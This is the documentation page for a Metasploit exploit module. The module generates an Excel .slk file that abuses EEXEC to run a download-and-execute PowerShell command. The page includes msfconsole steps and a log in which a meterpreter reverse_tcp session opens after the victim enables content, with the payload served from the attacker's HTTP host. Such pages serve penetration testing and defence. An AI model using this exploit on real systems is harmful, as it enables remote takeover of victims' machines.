metasploit-gs/documentation/modules/exploit/windows/fileformat/office_excel_slk.md

Introduction

The .slk file format used by Microsoft Excel has the ability to execute local commands via the EEXEC(cmd) function. This module takes advantage of this 'feature' to run a download-and-execute powershell command in order to spawn a session on the target.

Vulnerable Application

Microsoft Excel (tested on Excel 2016)

Verification Steps

1. Start msfconsole
2. use exploit/windows/fileformat/office_excel_slk
3. set LHOST [IP]
4. set SRVHOST [IP]
5. run
6. Open generated file and press 'Enable Content' in Excel

Options

FILENAME

The name of the generated .slk file. Default is a randomly generated file name.

Scenarios

Microsoft Excel 2016 on Windows 10 Build 17763.288

msf > use exploit/windows/fileformat/office_excel_slk
msf exploit(office_excel_slk) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(office_excel_slk) > set lhost 192.168.146.1
lhost => 192.168.146.1
msf exploit(office_excel_slk) > set srvhost 192.168.146.1
srvhost => 192.168.146.1
msf exploit(office_excel_slk) > run
[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.146.1:4444
[+] msf.doc stored at /Users/carter/.msf4/local/msf.slk
[*] Using URL: http://192.168.146.1:8080/default.hta
[*] Server started.

Once the victim opens the file and clicks 'Enable Content' a session should spawn:

[*] Sending stage (957487 bytes) to 192.168.146.145
[*] Meterpreter session 1 opened (192.168.146.1:4444 -> 192.168.146.145:50165) at 2019-01-13 16:00:49 -0500